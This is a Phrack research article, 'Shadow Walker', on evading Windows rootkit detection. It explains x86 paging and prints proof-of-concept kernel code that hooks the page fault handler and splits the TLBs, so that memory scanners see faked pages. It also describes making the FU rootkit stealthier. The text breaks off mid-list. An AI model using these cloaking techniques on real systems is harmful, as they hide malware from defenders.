==Phrack Inc.== Volume 0x0b, Issue 0x3d, Phile #0x08 of 0x14 |=-------------------------=[ Shadow Walker ]=---------------------------=| |=--------=[ Raising The Bar For Windows Rootkit Detection ]=------------=| |=-----------------------------------------------------------------------=| |=---------=[ Sherri Sparks ]=---------=| |=---------=[ Jamie Butler ]=---------=| 0 - Introduction & Background On Rootkit Technology 0.1 - Motivations 1 - Rootkit Detection 1.1 - Detecting The Effect Of A Rootkit (Heuristics) 1.2 - Detecting The Rootkit Itself (Signatures) 2 - Memory Architecture Review 2.1 - Virtual Memory - Paging vs. Segmentation 2.2 - Page Tables & PTE's 2.3 - Virtual to Physical Address Translation 2.4 - The Role of the Page Fault Handler 2.5 - The Paging Performance Problem & the TLB 3 - Memory Cloaking Concept 3.1 - Hiding Executable Code 3.2 - Hiding Pure Data 3.3 - Related Work 3.4 - Proof of Concept Implementation 3.4.a - Modified FU Rootkit 3.4.b - Shadow Walker Memory Hook Engine 4 - Known Limitations & Performance Impact 5 - Detection 6 - Conclusion 7 - References 8 - Acknowlegements --[ 0 - Introduction & Background Rootkits have historically demonstrated a co-evolutionary adaptation and response to the development of defensive technologies designed to apprehend their subversive agenda. If we trace the evolution of rootkit technology, this pattern is evident. First generation rootkits were primitive. They simply replaced / modified key system files on the victim's system. The UNIX login program was a common target and involved an attacker replacing the original binary with a maliciously enhanced version that logged user passwords. Because these early rootkit modifications were limited to system files on disk, they motivated the development of file system integrity checkers such as Tripwire [1]. In response, rootkit developers moved their modifications off disk to the memory images of the loaded programs and, again, evaded detection. These 'second' generation rootkits were primarily based upon hooking techniques that altered the execution path by making memory patches to loaded applications and some operating system components such as the system call table. Although much stealthier, such modifications remained detectable by searching for heuristic abnormalities. For example, it is suspicious for the system service table to contain pointers that do not point to the operating system kernel. This is the technique used by VICE [2]. Third generation kernel rootkit techniques like Direct Kernel Object Manipulation (DKOM), which was implemented in the FU rootkit [3], capitalize on the weaknesses of current detection software by modifying dynamically changing kernel data structures for which it is impossible to establish a static trusted baseline. ----[ 0.1 - Motivations There are public rootkits which illustrate all of these various techniques, but even the most sophisticated Windows kernel rootkits, like FU, possess an inherent flaw. They subvert essentially all of the operating system's subsystems with one exception: memory management. Kernel rootkits can control the execution path of kernel code, alter kernel data, and fake system call return values, but they have not (yet) demonstrated the capability to 'hook' or fake the contents of memory seen by other running applications. In other words, public kernel rootkits are sitting ducks for in memory signature scans. Only now are security companies beginning to think of implementing memory signature scans. Hiding from memory scans is similar to the problem faced by early viruses attempting to hide on the file system. Virus writers reacted to anti-virus programs scanning the file system by developing polymorphic and metamorphic techniques to evade detection. Polymorphism attempts to alter the binary image of a virus by replacing blocks of code with functionally equivalent blocks that appear different (i.e. use different opcodes to perform the same task). Polymorphic code, therefore, alters the superficial appearance of a block of code, but it does not fundamentally alter a scanner's view of that region of system memory. Traditionally, there have been three general approaches to malicious code detection: misuse detection, which relies upon known code signatures, anomaly detection, which relies upon heuristics and statistical deviations from 'normal' behavior, and integrity checking which relies upon comparing current snapshots of the file system or memory with a known, trusted baseline. A polymorphic rootkit (or virus) effectively evades signature based detection of its code body, but falls short in anomaly or integrity detection schemes because it cannot easily camouflage the changes it makes to existing binary code in other system components. Now imagine a rootkit that makes no effort to change its superficial appearance, yet is capable of fundamentally altering a detectors view of an arbitrary region of memory. When the detector attempts to read any region of memory modified by the rootkit, it sees a 'normal', unaltered view of memory. Only the rootkit sees the true, altered view of memory. Such a rootkit is clearly capable of compromising all of the primary detection methodologies to varying degrees. The implications to misuse detection are obvious. A scanner attempts to read the memory for the loaded rootkit driver looking for a code signature and the rootkit simply returns a random, 'fake' view of memory (i.e. which does not include its own code) to the scanner. There are also implications for integrity validation approaches to detection. In these cases, the rootkit returns the unaltered view of memory to all processes other than itself. The integrity checker sees the unaltered code, finds a matching CRC or hash, and (erroneously) assumes that all is well. Finally, any anomaly detection methods which rely upon identifying deviant structural characteristics will be fooled since they will receive a 'normal' view of the code. An example of this might be a scanner like VICE which attempts to heuristically identify inline function hooks by the presence of a direct jump at the beginning of the function body. Current rootkits, with the exception of Hacker Defender [4], have made little or no effort to introduce viral polymorphism techniques. As stated previously, while a valuable technique, polymorphism is not a comprehensive solution to the problem for a rootkit because the rootkit cannot easily camouflage the changes it must make to existing code in order to install its hooks. Our objective, therefore, is to show proof of concept that the current architecture permits subversion of memory management such that a non polymorphic kernel mode rootkit (or virus) is capable of controlling the view of memory regions seen by the operating system and other processes with a minimal performance hit. The end result is that it is possible to hide a 'known' public rootkit driver (for which a code signature exists) from detection. To this end, we have designed an 'enhanced' version of the FU rootkit. In section 1, we discuss the basic techniques used to detect a rootkit. In section 2, we give a background summary of the x86 memory architecture. Section 3 outlines the concept of memory cloaking and proof of concept implementation for our enhanced rootkit. Finally, we conclude with a discussion of its detectability, limitations, future extensibility, and performance impact. Without further ado, we bid you welcome to 4th generation rootkit technology. --[ 1 - Rootkit Detection Until several months ago, rootkit detection was largely ignored by security vendors. Many mistakenly classified rootkits in the same category as other viruses and malware. Because of this, security companies continued to use the same detection methods the most prominent one being signature scans on the file system. This is only partially effective. Once a rootkit is loaded in memory is can delete itself on disk, hide its files, or even divert an attempt to open the rootkit file. In this section, we will examine more recent advances in rootkit detection. ----[ 1.2 - Detecting The Effect Of A Rootkit (Heuristics) One method to detect the presence of a rootkit is to detect how it alters other parameters on the computer system. In this way, the effects of the rootkit are seen although the actual rootkit that caused the deviation may not be known. This solution is a more general approach since no signature for a particular rootkit is necessary. This technique is also looking for the rootkit in memory and not on the file system. One effect of a rootkit is that it usually alters the execution path of a normal program. By inserting itself in the middle of a program's execution, the rootkit can act as a middle man between the kernel functions the program relies upon and the program. With this position of power, the rootkit can alter what the program sees and does. For example, the rootkit could return a handle to a log file that is different from the one the program intended to open, or the rootkit could change the destination of network communication. These rootkit patches or hooks cause extra instructions to be executed. When a patched function is compared to a normal function, the difference in the number of instructions executed can be indicative of a rootkit. This is the technique used by PatchFinder [5]. One of the drawbacks of PatchFinder is that the CPU must be put into single step mode in order to count instructions. So for every instruction executed an interrupt is fired and must be handled. This slows the performance of the system, which may be unacceptable on a production machine. Also, the actual number of instructions executed can vary even on a clean system. Another rootkit detection tool called VICE detects the presence of hooks in applications and in the kernel . VICE analyzes the addresses of the functions exported by the operating system looking for hooks. The exported functions are typically the target of rootkits because by filtering certain APIs rootkits can hide. By finding the hooks themselves, VICE avoids the problems associated with instruction counting. However, VICE also relies upon several APIs so it is possible for a rootkit to defeat its hook detection [6]. Currently the biggest weakness of VICE is that it detects all hooks both malicious and benign. Hooking is a legitimate technique used by many security products. Another approach to detecting the effects of a rootkit is to identify the operating system lying. The operating system exposes a well-known API in order for applications to interact with it. When the rootkit alters the results of a particular API, it is a lie. For example, Windows Explorer may request the number of files in a directory using several functions in the Win32 API. If the rootkit changes the number of files that the application can see, it is a lie. To detect the lie, a rootkit detector needs at least two ways to obtain the same information. Then, both results can be compared. RootkitRevealer [7] uses this technique. It calls the highest level APIs and compares those results with the results of the lowest level APIs. This method can be bypassed by a rootkit if it also hooks at those lowest layers. RootkitRevealer also does not address data alterations. The FU rootkit alters the kernel data structures in order to hide its processes. RootkitRevealer does not detect this because both the higher and lower layer APIs return the same altered data set. Blacklight from F-Secure [8] also tries to detect deviations from the truth. To detect hidden processes, it relies on an undocumented kernel structure. Just as FU walks the linked list of processes to hide, Blacklight walks a linked list of handle tables in the kernel. Every process has a handle table; therefore, by identifying all the handle tables Blacklight can find a pointer to every process on the computer. FU has been updated to also unhook the hidden process from the linked list of handle tables. This arms race will continue. ----[ 1.2 - Detecting the Rootkit Itself (Signatures) Anti-virus companies have shown that scanning file systems for signatures can be effective; however, it can be subverted. If the attacker camouflages the binary by using a packing routine, the signature may no longer match the rootkit. A signature of the rootkit as it will execute in memory is one way to solve this problem. Some host based intrusion prevention systems (HIPS) try to prevent the rootkit from loading. However, it is extremely difficult to block all the ways code can be loaded in the kernel . Recent papers by Jack Barnaby [9] and Chong [10] have highlighted the threat of kernel exploits, which will allow arbitrary code to be loaded into memory and executed. Although file system scans and loading detection are needed, perhaps the last layer of detection is scanning memory itself. This provides an added layer of security if the rootkit has bypassed the previous checks. Memory signatures are more reliable because the rootkit must unpack or unencrypt in order to execute. Not only can scanning memory be used to find a rootkit, it can be used to verify the integrity of the kernel itself since it has a known signature. Scanning kernel memory is also much faster than scanning everything on disk. Arbaugh et. al. [11] have taken this technique to the next level by implementing the scanner on a separate card with its own CPU. The next section will explain the memory architecture on Intel x86. --[ 2 - Memory Architecture Review In early computing history, programmers were constrained by the amount of physical memory contained in a system. If a program was too large to fit into memory, it was the programmer's responsibility to divide the program into pieces that could be loaded and unloaded on demand. These pieces were called overlays. Forcing this type of memory management upon user level programmers increased code complexity and programming errors while reducing efficiency. Virtual memory was invented to relieve programmers of these burdens. ----[ 2.1 - Virtual Memory - Paging vs. Segmentation Virtual memory is based upon the separation of the virtual and physical address spaces. The size of the virtual address space is primarily a function of the width of the address bus whereas the size of the physical address space is dependent upon the quantity of RAM installed in the system. Thus, a system possessing a 32 bit bus is capable of addressing 2^32 (or ~4 GB) physical bytes of contiguous memory. It may, however, not have anywhere near that quantity of RAM installed. If this is the case, then the virtual address space will be larger than the physical address space. Virtual memory divides both the virtual and physical address spaces into fixed size blocks. If these blocks are all the same size, the system is said to use a paging memory model. If the blocks are varying sizes, it is considered to be a segmentation model. The x86 architecture is in fact a hybrid, utlizing both segementation and paging, however, this article focuses primarily upon exploitation of its paging mechanism. Under a paging model, blocks of virtual memory are referred to as pages and blocks of physical memory are referred to as frames. Each virtual page maps to a designated physical frame. This is what enables the virtual address space seen by programs to be larger than the amount of physically addressable memory (i.e. there may be more pages than physical frames). It also means that virtually contiguous pages do not have to be physically contiguous. These points are illustrated by Figure 1. VIRTUAL ADDRESS PHYSICAL ADDRESS SPACE SPACE /-------------\ /-------------\ | | | | | PAGE 01 |---\ /----------->>>| FRAME 01 | | | | | | | --------------- | | --------------- | | | | | | | PAGE 02 |------------------->>>| FRAME 02 | | | | | | | --------------- | | --------------- | | | | | | | PAGE 03 | \---|----------->>>| FRAME 03 | | | | | | --------------- | \-------------/ | | | | PAGE 04 | | | | | |-------------| | | | | | PAGE 05 |-------/ | | \-------------/ [ Figure 1 - Virtual To Physical Memory Mapping (Paging) ] [ ] [ NOTE: 1. Virtual & physical address spaces are divided into ] [ fixed size blocks. 2. The virtual address space may be larger ] [ than the physical address space. 3. Virtually contiguous ] [ blocks to not have to be mapped to physically contiguous ] [ frames. ] ----[ 2.2 - Page Tables & PTE's The mapping information that connects a virtual address with its physical frame is stored in page tables in structures known as PTE's. PTE's also store status information. Status bits may indicate, for example, weather or not a page is valid (physically present in memory versus stored on disk), if it is writable, or if it is a user / supervisor page. Figure 2 shows the format for an x86 PTE. Valid <------------------------------------------------\ Read/Write <--------------------------------------------\ | Privilege <----------------------------------------\ | | Write Through <------------------------------------\ | | | Cache Disabled <--------------------------------\ | | | | Accessed <---------------------------\ | | | | | Dirty <-----------------------\ | | | | | | Reserved <-------------------\ | | | | | | | Global <---------------\ | | | | | | | | Reserved <----------\ | | | | | | | | | Reserved <-----\ | | | | | | | | | | Reserved <-\ | | | | | | | | | | | | | | | | | | | | | | | +----------------+---+----+----+---+---+---+----+---+---+---+---+-+ | | | | | | | | | | | U | R | | | PAGE FRAME # | U | P | Cw | Gl | L | D | A | Cd | Wt| / | / | V | | | | | | | | | | | | S | W | | +-----------------------------------------------------------------+ [ Figure 2 - x86 PTE FORMAT (4 KBYTE PAGE) ] ----[ 2.4 - Virtual To Physical Address Translation Virtual addresses encode the information necessary to find their PTE's in the page table. They are divided into 2 basic parts: the virtual page number and the byte index. The virtual page number provides the index into the page table while the byte index provides an offset into the physical frame. When a memory reference occurs, the PTE for the page is looked up in the page table by adding the page table base address to the virtual page number * PTE entry size. The base address of the page in physical memory is then extracted from the PTE and combined with the byte offset to define the physical memory address that is sent to the memory unit. If the virtual address space is particularly large and the page size relatively small, it stands to reason that it will require a large page table to hold all of the mapping information. And as the page table must remain resident in main memory, a large table can be costly. One solution to this dilemma is to use a multi-level paging scheme. A two-level paging scheme, in effect, pages the page table. It further subdivides the virtual page number into a page directory and a page table index. The page directory is simply a table of pointers to page tables. This two level paging scheme is the one supported by the x86. Figure 3 illustrates how the virtual address is divided up to index the page directory and page tables and Figure 4 illustrates the process of address translation. +---------------------------------------+ | 31 12 | 0 | +----------------+ +----------------+ | +---------------+ | | PAGE DIRECTORY | | PAGE TABLE | | | BYTE INDEX | | | INDEX | | INDEX | | | | | +----------------+ +----------------+ | +---------------+ | 10 bits 10 bits | 12 bits | | | VIRTUAL PAGE NUMBER | +---------------------------------------+ [ Figure 3 - x86 Address & Page Table Indexing Scheme ] +--------+ /-|KPROCESS| | +--------+ | Virtual Address | +------------------------------------------+ | | Page Directory | Page Table | Byte Index | | | Index | Index | | | +-+-------------------+-------------+------+ | | +---+ | | | | |CR3| Physical | | | | +---+ Address Of | | | | Page Dir | | | | | \------ -\ | | | | | | Page Directory | Page Table | Physical Memory \---|->+------------+ | /-->+------------+ \---->+------------+ | | | | | | | | | | | | | | | | | | | | | | | | | |------------| | | | | | | | | | | |------------| | | | | | Page | \->| PDN |---|-/ | | | Frame | |------------| | | | /----> | | | | | | | |------------| | | | | | | | | | | | | | | | | | | | | | | | | | | | |------------| | | | | | \---->| PFN -------/ | | | | |------------| | | +------------+ +------------+ +------------+ (1 per process) (512 per processs) [ Figure 4 - x86 Address Translation ] A memory access under a 2 level paging scheme potentially involves the following sequence of steps. 1. Lookup of page directory entry (PDE). Page Directory Entry = Page Directory Base Address + sizeof(PDE) * Page Directory Index (extracted from virtual address that caused the memory access) NOTE: Windows maps the page directory to virtual address 0xC0300000. Base addresses for page directories are also located in KPROCESS blocks and the register cr3 contains the physical address of the current page directory. 2. Lookup of page table entry. Page Table Entry = Page Table Base Address + sizeof(PTE) * Page Table Index (extracted from virtual address that caused the memory access). NOTE: Windows maps the page directory to virtual address 0xC0000000. The base physical address for the page table is also stored in the page directory entry. 3. Lookup of physical address. Physical Address = Contents of PTE + Byte Index NOTE: PTEs hold the physical address for the physical frame. This is combined with the byte index (offset into the frame) to form the complete physical address. For those who prefer code to explanation, the following two routines show how this translation occurs. The first routine, GetPteAddress performs steps 1 and 2 described above. It returns a pointer to the page table entry for a given virtual address. The second routine returns the base physical address of the frame to which the page is mapped. #define PROCESS_PAGE_DIR_BASE 0xC0300000 #define PROCESS_PAGE_TABLE_BASE 0xC0000000 typedef unsigned long* PPTE; /************************************************************************** * GetPteAddress - Returns a pointer to the page table entry corresponding * to a given memory address. * * Parameters: * PVOID VirtualAddress - Address you wish to acquire a pointer to the * page table entry for. * * Return - Pointer to the page table entry for VirtualAddress or an error * code. * * Error Codes: * ERROR_PTE_NOT_PRESENT - The page table for the given virtual * address is not present in memory. * ERROR_PAGE_NOT_PRESENT - The page containing the data for the * given virtual address is not present in * memory. **************************************************************************/ PPTE GetPteAddress( PVOID VirtualAddress ) { PPTE pPTE = 0; __asm { cli //disable interrupts pushad mov esi, PROCESS_PAGE_DIR_BASE mov edx, VirtualAddress mov eax, edx shr eax, 22 lea eax, [esi + eax*4] //pointer to page directory entry test [eax], 0x80 //is it a large page? jnz Is_Large_Page //it's a large page mov esi, PROCESS_PAGE_TABLE_BASE shr edx, 12 lea eax, [esi + edx*4] //pointer to page table entry (PTE) mov pPTE, eax jmp Done //NOTE: There is not a page table for large pages because //the phys frames are contained in the page directory. Is_Large_Page: mov pPTE, eax Done: popad sti //reenable interrupts }//end asm return pPTE; }//end GetPteAddress /************************************************************************** * GetPhysicalFrameAddress - Gets the base physical address in memory where * the page is mapped. This corresponds to the * bits 12 - 32 in the page table entry. * * Parameters - * PPTE pPte - Pointer to the PTE that you wish to retrieve the * physical address from. * * Return - The physical address of the page. **************************************************************************/ ULONG GetPhysicalFrameAddress( PPTE pPte ) { ULONG Frame = 0; __asm { cli pushad mov eax, pPte mov ecx, [eax] shr ecx, 12 //physical page frame consists of the //upper 20 bits mov Frame, ecx popad sti }//end asm return Frame; }//end GetPhysicalFrameAddress ----[ 2.5 - The Role Of The Page Fault Handler Since many processes only use a small portion of their virtual address space, only the used portions are mapped to physical frames. Also, because physical memory may be smaller than the virtual address space, the OS may move less recently used pages to disk (the pagefile) to satisfy current memory demands. Frame allocation is handled by the operating system. If a process is larger than the available quantity of physical memory, or the operating system runs out of free physical frames, some of the currently allocated frames must be swapped to disk to make room. These swapped out pages are stored in the page file. The information about whether or not a page is resident in main memory is stored in the page table entry. When a memory access occurs, if the page is not present in main memory a page fault is generated. It is the job of the page fault handler to issue the I/O requests to swap out a less recently used page if all of the available physical frames are full and then to bring in the requested page from the pagefile. When virtual memory is enabled, every memory access must be looked up in the page table to determine which physical frame it maps to and whether or not it is present in main memory. This incurs a substantial performance overhead, especially when the architecture is based upon a multi-level page table scheme like the Intel Pentium. The memory access page fault path can be summarized as follows. 1. Lookup in the page directory to determine if the page table for the address is present in main memory. 2. If not, an I/O request is issued to bring in the page table from disk. 3. Lookup in the page table to determine if the requested page is present in main memory. 4. If not, an I/O request is issued to bring in the page from disk. 5. Lookup the requested byte (offset) in the page. Therefore every memory access, in the best case, actually requires 3 memory accesses : 1 to access the page directory, 1 to access the page table, and 1 to get the data at the correct offset. In the worst case, it may require an additional 2 disk I/Os (if the pages are swapped out to disk). Thus, virtual memory incurs a steep performance hit. ----[ 2.6 - The Paging Performance Problem & The TLB The translation lookaside buffer (TLB) was introduced to help mitigate this problem. Basically, the TLB is a hardware cache which holds frequently used virtual to physical mappings. Because the TLB is implemented using extremely fast associative memory, it can be searched for a translation much faster than it would take to look that translation up in the page tables. On a memory access, the TLB is first searched for a valid translation. If the translation is found, it is termed a TLB hit. Otherwise, it is a miss. A TLB hit, therefore, bypasses the slower page table lookup. Modern TLB's have an extremely high hit rate and therefore seldom incur miss penalty of looking up the translation in the page table. --[ 3 - Memory Cloaking Concept One goal of an advanced rootkit is to hide its changes to executable code (i.e. the placement of an inline patch, for example). Obviously, it may also wish to hide its own code from view. Code, like data, sits in memory and we may define the basic forms of memory access as: - EXECUTE - READ - WRITE Technically speaking, we know that each virtual page maps to a physical page frame defined by a certain number of bits in the page table entry. What if we could filter memory accesses such that EXECUTE accesses mapped to a different physical frame than READ / WRITE accesses? From a rootkit's perspective, this would be highly advantageous. Consider the case of an inline hook. The modified code would run normally, but any attempts to read (i.e. detect) changes to the code would be diverted to a 'virgin' physical frame that contained a view of the original, unaltered code. Similarly, a rootkit driver might hide itself by diverting READ accesses within its memory range off to a page containing random garbage or to a page containing a view of code from another 'innocent' driver. This would imply that it is possible to spoof both signature scanners and integrity monitors. Indeed, an architectural feature of the Pentium architecture makes it possible for a rootkit to perform this little trick with a minimal impact on overall system performance. We describe the details in the next section. ----[ 3.1 - Hiding Executable Code Ironically, the general methodology we are about to discuss is an offensive extension of an existing stack overflow protection scheme known as PaX. We briefly discuss the PaX implementation in 3.3 under related work. In order to hide executable code, there are at least 3 underlying issues which must be addressed: 1. We need a way to filter execute and read / write accesses. 2. We need a way to "fake" the read / write memory accesses when we detect them. 3. We need to ensure that performance is not adversly affected. The first issue concerns how to filter execute accesses from read / write accesses. When virtual memory is enabled, memory access restrictions are enforced by setting bits in the page table entry which specify whether a given page is read-only or read-write. Under the IA-32 architecture, however, all pages are executable. As such, there is no official way to filter execute accesses from read / write accesses and thus enforce the execute-only / diverted read-write semantics necessary for this scheme to work. We can, however, trap and filter memory accesses by marking their PTE's non present and hooking the page fault handler. In the page fault handler we have access to the saved instruction pointer and the faulting address. If the instruction pointer equals the faulting address, then it is an execute access. Otherwise, it is a read / write. As the OS uses the present bit in memory management, we also need to differentiate between page faults due to our memory hook and normal page faults. The simplest way is to require that all hooked pages either reside in non paged memory or be explicitly locked down via an API like MmProbeAndLockPages. The next issue concerns how to "fake" the EXECUTE and READ / WRITE accesses when we detect them (and do so with a minimal performance hit). In this case, the Pentium TLB architecture comes to the rescue. The pentium possesses a split TLB with one TLB for instructions and the other for data. As mentioned previously, the TLB caches the virtual to physical page frame mappings when virtual memory is enabled. Normally, the ITLB and DTLB are synchronized and hold the same physical mapping for a given page. Though the TLB is primarily hardware controlled, there are several software mechanisms for manipulating it. - Reloading cr3 causes all TLB entries except global entries to be flushed. This typically occurs on a context switch. - The invlpg causes a specific TLB entry to be flushed. - Executing a data access instruction causes the DTLB to be loaded with the mapping for the data page that was accessed. - Executing a call causes the ITLB to be loaded with the mapping for the page containing the code executed in response to the call. We can filter execute accesses from read / write accesses and fake them by desynchronizing the TLB's such that the ITLB holds a different virtual to physical mapping than the DTLB. This process is performed as follows: First, a new page fault handler is installed to handle the cloaked page accesses. Then the page-to-be-hooked is marked not present and it's TLB entry is flushed via the invlpg instruction. This ensures that all subsequent accesses to the page will be filtered through the installed page fault handler. Within the installed page fault handler, we determine whether a given memory access is due to an execute or read/write by comparing the saved instruction pointer with the faulting address. If they match, the memory access is due to an execute. Otherwise, it is due to a read / write. The type of access determines which mapping is manually loaded into the ITLB or DTLB. Figure 5 provides a conceptual view of this strategy. Lastly, it is important to note that TLB access is much faster than performing a page table lookup. In general, page faults are costly. Therefore, at first glance, it might appear that marking the hidden pages not present would incur a significant performance hit. This is, in fact, not the case. Though we mark the hidden pages not present, for most memory accesses we do not incur the penalty of a page fault because the entries are cached in the TLB. The exceptions are, of course, the initial faults that occur after marking the cloaked page not present and any subsequent faults which result from cache line evictions when a TLB set becomes full. Thus, the primary job of the new page fault handler is to explicitly and selectively load the DTLB or ITLB with the correct mappings for hidden pages. All faults originating on other pages are passed down to the operating system page fault handler. +-------------+ rootkit code | FRAME 1 | Is it a +-----------+ /------------->| | code | | | |-------------| access? | ITLB | | | FRAME 2 | /------>|-----------|-----------/ | | | | VPN=12 | |-------------| | | Frame=1 | | FRAME 3 | | +-----------+ | | | +-------------+ |-------------| MEMORY | PAGE TABLES | | FRAME 4 | ACCESS +-------------+ | | VPN=12 |-------------| | | FRAME 5 | | +-----------+ | | | | | |-------------| | | DTLB | random garbage | FRAME 6 | |------>|------------------------------------->| | Is it a | VPN=12 | |-------------| data | Frame=6 | | FRAME N | access? +-----------+ | | +-------------+ [ Figure 5 - Faking Read / Writes by Desynchronizing the Split TLB ] ----[ 3.2 - Hiding Pure Data Hiding data modifications is significantly less optimal than hiding code modifications, but it can be accomplished provided that one is willing to accept the performance hit. We cause a minimal performance loss when hiding executable code by virtue of the fact that the ITLB can maintain a different mapping than the DTLB. Code can execute very fast with a minimum of page faults because that mapping is always present in the ITLB (except in the rare event the ITLB entry gets evicted from the cache). Unfortunately, in the case of data we can't introduce any such inconsistency. There is only 1 DTLB and consequently that DTLB has to be kept empty if we are to catch and filter specific data accesses. The end result is 1 page fault per data access. This is not be a big problem in terms of hiding a specific driver if the driver is carefully designed and uses a minimum of global data, but the performance hit could be formidable when trying to hide a frequently accessed data page. For data hiding, we have used a protocol based approach between the hidden driver and the memory hook. We use this to show how one might hide global data in a rootkit driver. In order to allow the memory access to go throug the DTLB is loaded in the page fault handler. In order to enforce the correct filtering of data accesses, however, it must be flushed immediately by the requesting driver to ensure that no other code accesses that memory address and receives the data resulting from an incorrect mapping. The protocol for accessing data on a hidden page is as follows: 1. The driver raises the IRQL to DISPATCH_LEVEL (to ensure that no other code gets to run which might see the "hidden" data as opposed to the "fake" data). 2. The driver must explicitly flush the TLB entry for the page containing the cloaked variable using the invlpg instruction. In the event that some other process has attempted to access our data page and been served with the fake frame (i.e. we don't want to receive the fake mapping which may still reside in the TLB so we clear it to be sure). 3. The driver is allowed to perform the data access. 4. The driver must explicitly flush the TLB entry for the page containing the cloaked variable using the invlpg instruction (i.e. so that the "real" mapping does not remain in the TLB. We don't want any other drivers or processes receiving the hidden mapping so we clear it). 5. The driver lowers the IRQL to the previous level before it was raised. The additional restriction also applies: - No global data can be passed to kernel API functions. When calling an API, global data must be copied into local storage on the stack and passed into the API function (i.e. if the API accesses the cloaked variable it will receive fake data and perform incorrectly). This protocol can be efficiently implemented in the hidden driver by having the driver copy all global data over into local variables at the beginning of the routine and then copy the data back after the function body has completed executing. Because stack data is in a constant state of flux, it is unlikely that a signature could be reliably obtained from global data on the stack. In this way, there is no need to cause a page fault on every global access. In general, only one page fault is required to copy over the data at the beginning of the routine and one fault to copy the data back at the end of the routine. Admittedly, this disregards more complex issues involved with multithreaded access and synchronization. An alternative approach to using a protocol between the driver and PF handler would be to single step the instruction causing the memory access. This would be less cumbersome for the driver and yet allow the PF handler to maintain control of the DTLB (ie. to flush it after the data access so that it remains empty). ----[ 3.3 - Related Work Ironically, the memory cloaking technology discussed in this article is derived from an existing stack overflow protection scheme known as PaX . As such, we demonstrate a potentially offensive application of an originally defensive technology. Though very similar (i.e. taking advantage of the Pentium split TLB architecture), there are subtle differences between PaX and the rootkit application of the technology. Whereas our memory cloaked rootkit enforces execute, diverted read / write semantics, PaX enforces read / write, no execute semantics. This enables PaX to provide software support for a non executable stack under the IA-32 architecture, thereby thwarting a large class of stack based buffer overflow attacks. When a PaX protected system detects an attempted execute in a read / write only range of memory, it terminates the offending process. Hardware support for non executable memory has subsequently been added to the page table entry format for some processors including IA-64 and pentium 4. In contrast to PaX, our rootkit handler allows execution to proceed normally while diverting read / write accesses to the hidden page off to an innocent appearing shadow page. Finally, it should be noted that PaX uses the PTE user / supervisor bit to generate the page faults required to enforce its protection. This limits it to protection of solely user mode pages which is an impractical limitation for a kernel mode rootkit. As such, we use the PTE present / not present bit in our implementation. ----[ 3.4 - Proof Of Concept Implementation Our current implementation uses a modified FU rootkit and a new page fault handler called Shadow Walker. Since FU alters kernel data structures to hide processes and does not utilize any code hooks, we only had to be concerned with hiding the FU driver in memory. The kernel accounts for every process running on the system by storing an object called an EPROCESS block for each process in an internal linked list. FU disconnects the process it wants to hide from this linked list. ------[ 3.4.a - Modified FU Rootkit We modified the current version of the FU rootkit taken from rootkit.com. In order to make it more stealthy, its dependence on a userland initialization program was removed. Now, all setup information in the form of OS dependant offsets are derived with a kernel level function. By removing the userland portion, we eliminated the need to create a symbolic link to the driver and the need to create a functional device, both of which are easily detected. Once FU is installed, its image on the file system can be deleted so all anti-virus scans on the file system will fail to find it. You can also imagine that FU could be installed from a kernel exploit and loaded into memory thereby avoiding any image on disk detection. Also, FU hides all processes whose names are prefixed with _fu_ regardless of the process ID (PID). We create a System thread that continually scans this list of processes looking for this prefix. FU and the memory hook, Shadow Walker, work in collusion; therefore, FU relies on Shadow Walker to remove the driver from the linked list of drivers in memory and from the Windows Object Manager's driver directory. ----[ 3.4.b - Shadow Walker Memory Hook Engine Shadow Walker consists of a memory hook installation module and a new page fault handler. The memory hook module takes the virtual address of the page to be hidden as a parameter. It uses the information contained in the address to perform a few sanity checks. Shadow Walker then installs the new page fault handler by hooking Int 0E (if it has not been previously installed) and inserts the information about the hidden page into a hash table so that it can be looked up quickly on page faults. Lastly, the PTE for the page is marked non present and the TLB entry for the hidden page is flushed. This ensures that all subsequent accesses to the page are filtered by the new page fault handler. /************************************************************************* * HookMemoryPage - Hooks a memory page by marking it not present * and flushing any entries in the TLB. This ensure * that all subsequent memory accesses will generate * page faults and be filtered by the page fault handler. * * Parameters: * PVOID pExecutePage - pointer to the page that will be used on * execute access * * PVOID pReadWritePage - pointer to the page that will be used to load * the DTLB on data access * * * PVOID pfnCallIntoHookedPage - A void function which will be called * from within the page fault handler to * to load the ITLB on execute accesses * * PVOID pDriverStarts (optional) - Sets the start of the valid range * for data accesses originating from * within the hidden page. * * PVOID pDriverEnds (optional) - Sets the end of the valid range for * data accesses originating from within * the hidden page. * Return - None **************************************************************************/ void HookMemoryPage( PVOID pExecutePage, PVOID pReadWritePage, PVOID pfnCallIntoHookedPage, PVOID pDriverStarts, PVOID pDriverEnds ) { HOOKED_LIST_ENTRY HookedPage = {0}; HookedPage.pExecuteView = pExecutePage; HookedPage.pReadWriteView = pReadWritePage; HookedPage.pfnCallIntoHookedPage = pfnCallIntoHookedPage; if( pDriverStarts != NULL) HookedPage.pDriverStarts = (ULONG)pDriverStarts; else HookedPage.pDriverStarts = (ULONG)pExecutePage; if( pDriverEnds != NULL) HookedPage.pDriverEnds = (ULONG)pDriverEnds; else { //set by default if pDriverEnds is not specified if( IsInLargePage( pExecutePage ) ) HookedPage.pDriverEnds = (ULONG)HookedPage.pDriverStarts + LARGE_PAGE_SIZE; else HookedPage.pDriverEnds = (ULONG)HookedPage.pDriverStarts + PAGE_SIZE; }//end if __asm cli //disable interrupts if( hooked == false ) { HookInt( &g_OldInt0EHandler, (unsigned long)NewInt0EHandler, 0x0E ); hooked = true; }//end if HookedPage.pExecutePte = GetPteAddress( pExecutePage ); HookedPage.pReadWritePte = GetPteAddress( pReadWritePage ); //Insert the hooked page into the list PushPageIntoHookedList( HookedPage ); //Enable the global page feature EnableGlobalPageFeature( HookedPage.pExecutePte ); //Mark the page non present MarkPageNotPresent( HookedPage.pExecutePte ); //Go ahead and flush the TLBs. We want to guarantee that all //subsequent accesses to this hooked page are filtered //through our new page fault handler. __asm invlpg pExecutePage __asm sti //reenable interrupts }//end HookMemoryPage The functionality of the page fault handler is relatively straight forward despite the seeming complexity of the scheme. Its primary functions are to determine if a given page fault is originating from a hooked page, resolve the access type, and then load the appropriate TLB. As such, the page fault handler has basically two execution paths. If the page is unhooked, it is passed down to the operating system page fault handler. This is determined as quickly and efficiently as possible. Faults originating from user mode addresses or while the processor is running in user mode are immediately passed down. The fate of kernel mode accesses is also quickly decided via a hash table lookup. Alternatively, once the page has been determined to be hooked the access type is checked and directed to the appropriate TLB loading code (Execute accesses will cause a ITLB load while Read / Write accesses cause a DTLB load). The procedure for TLB loading is as follows: 1. The appropriate physical frame mapping is loaded into the PTE for the faulting address. 2. 